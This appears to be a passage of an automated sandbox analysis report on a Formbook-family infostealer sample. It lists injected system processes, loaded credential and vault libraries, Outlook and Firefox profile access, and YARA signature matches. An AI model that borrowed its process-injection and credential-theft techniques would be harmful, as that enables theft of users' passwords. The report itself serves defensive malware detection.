            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03535AA0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0358DAAC
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03591AA3
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0350B950
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F9950
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03585910
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0355D800
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F38E0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AFF09
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B3FD2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B3FD5
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F1F92
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AFFB1
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F9EB0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A1D5A
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F3D40
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A7D73
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0350FDC0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03569C32
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AFCF2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C91B10
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8CA90
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8CCB0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8AD29
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8AD30
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CAB2B0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9379B
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C937A0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0329E3A8
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0329E4C3
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0329E85D
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0329D8C8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: String function: 00770D27 appears 70 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: String function: 00778B40 appears 42 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: String function: 00757F41 appears 35 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 03537E54 appears 111 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 0356F290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 034DB970 appears 280 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 0355EA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 03525130 appears 58 times
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2099822981.0000000003CB3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100662687.0000000003E5D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BA2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007A8713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BC602 CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00754FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | File created: C:\Users\user\AppData\Local\Temp\aut9784.tmp
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RpcPing.exe, 00000009.00000003.2983637065.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2983493230.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.000000000310D000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.00000000030E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | ReversingLabs: Detection: 47%
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe"
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\RpcPing.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static file information: File size 1208832 > 1048576
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DUipWAeQLm.exe, 00000008.00000002.3338157469.00000000001EE000.00000002.00000001.01000000.00000005.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3337844651.00000000001EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100307980.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000003.2100194714.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2463716754.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2668017220.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454253649.0000000003800000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000009.00000002.3340029491.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2668762022.0000000003153000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3340029491.000000000364E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000009.00000003.2678637133.0000000003309000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.2635580745.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635597112.000000000362B000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000002.3338848477.00000000007A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000009.00000002.3340567073.0000000003ADC000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3124724882.0000000036F1C000.00000004.80000000.00040000.00000000.sdmp
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress, | 0_2_007CC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0075C590 push eax; retn 0075h | 0_2_0075C599
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00778B85 push ecx; ret | 0_2_00778B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004190A0 push esp; ret | 2_2_004190B5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408926 push ebx; iretd | 2_2_0040892A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D99B pushad ; ret | 2_2_0040D99C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EB96 push FFFFFF8Fh; retf | 2_2_0041EB9A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411CAC pushfd ; retf | 2_2_00411CB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411CBF push 3E557F42h; ret | 2_2_00411CC4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403570 push eax; ret | 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004075A7 push 67C9EEB0h; retf | 2_2_004075B1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0225F pushad ; ret | 2_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C027FA pushad ; ret | 2_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx | 2_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0283D push eax; iretd | 2_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C01368 push eax; iretd | 2_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C01065 push edi; ret | 2_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C018F3 push edx; iretd | 2_2_03C01906
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B225F pushad ; ret | 9_2_034B27F9
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B27FA pushad ; ret | 9_2_034B27F9
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034E09AD push ecx; mov dword ptr [esp], ecx | 9_2_034E09B6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B283D push eax; iretd | 9_2_034B2858
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034B135E push eax; iretd | 9_2_034B1369
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C84034 push 67C9EEB0h; retf | 9_2_02C8403E
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9C1B7 push ebx; ret | 9_2_02C9C1C7
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C926B7 push ebp; ret | 9_2_02C926C2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C92799 push edx; retf | 9_2_02C9279A
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8E74C push 3E557F42h; ret | 9_2_02C8E751
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8E739 pushfd ; retf | 9_2_02C8E745
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C853B3 push ebx; iretd | 9_2_02C853B7
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C8D360 push FFFFFFF6h; retf | 9_2_02C8D36D
